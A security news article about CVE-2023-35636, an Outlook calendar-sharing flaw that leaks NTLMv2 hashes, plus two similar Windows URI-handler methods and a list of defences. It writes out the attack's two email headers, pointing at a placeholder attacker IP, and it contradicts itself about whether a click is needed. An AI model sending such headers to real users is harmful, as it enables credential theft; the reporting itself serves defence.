New Outlook Vulnerability Allows Attackers to Steal NTLM Hashes

A new critical vulnerability has been discovered in Microsoft Outlook that could allow hackers to steal user passwords. Security researchers at Varonis Threat Labs recently revealed that they have found a way to exploit Outlook's calendar sharing feature to intercept NTLMv2 password hashes.

NTLMv2 (NT Lan Manager version 2) is an authentication protocol commonly used in Windows networks. Though more secure than previous versions, researchers say NTLMv2 is still vulnerable to offline brute-force attacks. With access to the hashed passwords, attackers could crack them and gain access to user accounts.

Varonis disclosed the vulnerability, dubbed CVE-2023-35636, to Microsoft in July. Microsoft categorized it as an "important" vulnerability and issued a patch on December 12th. However, systems that have not yet installed the update remain at risk.

In addition to the Outlook exploit, Varonis found two other methods to obtain NTLMv2 hashes by taking advantage of Windows components like the Windows Performance Analyzer (WPA) tool and Windows File Explorer. They reported these issues to Microsoft as well, but so far Microsoft has only classified them as "moderate severity."

How the Outlook Exploit Works

The Outlook exploit works by adding two specific headers to an email:

1. Content-Class: Sharing
2. x-sharing-config-url: \(Attacker IP)\test.ics

The first header signals that the email contains sharing content. The second points to a configuration file on the attacker's server.

If the victim clicks "Open this iCal" in the message, Outlook will attempt to retrieve that configuration file. This causes Outlook to authenticate to the attacker's server using the victim's NTLMv2 hash. The attacker can then intercept the hashed password for offline cracking.

This vulnerability allows remote attackers to steal passwords without any user interaction beyond opening the email. The Varonis team proved the attack works by collecting hashes using a tool called Responder.

Once hashes are obtained, attackers can crack them through an offline brute-force attack. This involves trying every possible password combination against the hash on the attacker's own systems. Since this attack doesn't generate any abnormal network activity, it can be difficult to detect.

With access to plaintext passwords, hackers can easily impersonate users and access sensitive systems and data.

Other Methods Discovered to Leak NTLM Hashes

In addition to the Outlook exploit, Varonis disclosed two other methods to obtain password hashes by taking advantage of Windows tools like WPA and File Explorer.

The WPA attack works by including a malicious "wpa://" link in an email or website. When users click this link, the Windows Performance Analyzer tool launches and attempts to authenticate to the attacker's server using NTLMv2. This sends the hash over the public internet where it can be intercepted.

The Windows File Explorer attack is executed similarly, using the "search-ms://" URI handler. By inserting attacker-controlled paths in the URI, hackers can force File Explorer to authenticate to a remote server and expose the NTLMv2 hash.

For these attacks, Microsoft has not yet issued patches, citing only "moderate severity." Still, unpatched systems are vulnerable to phishing attempts using these techniques.

Protection Against NTLMv2 Hashing Attacks

To protect against these kinds of password-stealing attacks, Varonis suggests the following measures:

• Enable SMB signing to validate the integrity of NTLMv2 authentication attempts.
• Block outgoing NTLMv2 traffic completely. Windows 11 allows this starting with build 25951.
• Enforce Kerberos authentication over NTLMv2 when possible. Kerberos uses stronger encryption and key exchange methods.
• Monitor network activity for signs of NTLMv2 relay attacks.
• Encourage strong password policies among users. Stronger passwords resist brute-force cracking.
• Deploy multi-factor authentication for secure remote access and VPNs.
• Keep all apps and operating systems patched and updated.

Millions of Outlook Users at Risk

This new vulnerability puts millions of Outlook users at risk until patches are widely adopted. Given Outlook's widespread corporate use, the exploit has the potential to provide attackers access to sensitive systems and data at many organizations.

🚨Alert🚨New Outlook Exploit Unveiled: CVE-2023-35636 Leads to NTLM v2 Password Breach
⚠️This exploit enables attackers to intercept NTLM v2 hashes, which are used for authentication in Microsoft Windows systems.
📊910k+ Services are found on the https://t.co/WrjZaG0jRH… pic.twitter.com/HWs30NJUah

— Hunter (@HunterMapping) January 22, 2024

Users are recommended to install the latest Microsoft security updates as soon as possible. Administrators may want to expedite patching for Outlook and proactively monitor for signs of exploitation attempts in their environments.

Stay tuned for more details as Microsoft and the security community analyze the impact of this newly reported vulnerability. We'll post updates if any additional protective measures or details emerge.